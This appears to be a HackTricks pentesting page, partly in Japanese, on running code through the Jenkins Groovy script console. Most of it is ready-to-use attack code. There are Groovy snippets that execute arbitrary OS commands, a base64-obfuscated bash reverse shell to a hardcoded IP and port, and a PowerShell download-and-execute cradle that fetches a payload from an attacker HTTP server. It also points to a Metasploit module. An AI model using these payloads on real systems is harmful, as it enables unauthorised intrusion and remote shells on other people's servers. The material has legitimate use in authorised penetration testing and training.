Jenkins RCE with Groovy Script

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Jenkins RCE with Groovy Script

これはJenkinsで新しいプロジェクトを作成するよりも騒がしくありません。

_path_jenkins/script_に移動します。
テキストボックスにスクリプトを入力します。

def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"

コマンドを実行するには、次のようにします: cmd.exe /c dir

linux では、次のようにできます: "ls /".execute().text

テキスト内で quotes と single quotes を使用する必要がある場合は、"""PAYLOAD""" (トリプルダブルクォート) を使用してペイロードを実行できます。

別の便利なgroovyスクリプトは ( [INSERT COMMAND] を置き換えてください):

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Linuxにおけるリバースシェル

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Windowsでのリバースシェル

PSリバースシェルを用意したHTTPサーバーを準備し、Jenkinsを使用してそれをダウンロードして実行できます:

scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>

スクリプト

このプロセスをこのスクリプトで自動化できます。

MSFを使用してリバースシェルを取得できます:

msf> use exploit/multi/http/jenkins_script_console

HackTricksをサポートする

サブスクリプションプランを確認してください！
**💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。

PreviousBasic Jenkins Information NextJenkins RCE Creating/Modifying Project

Last updated 3 days ago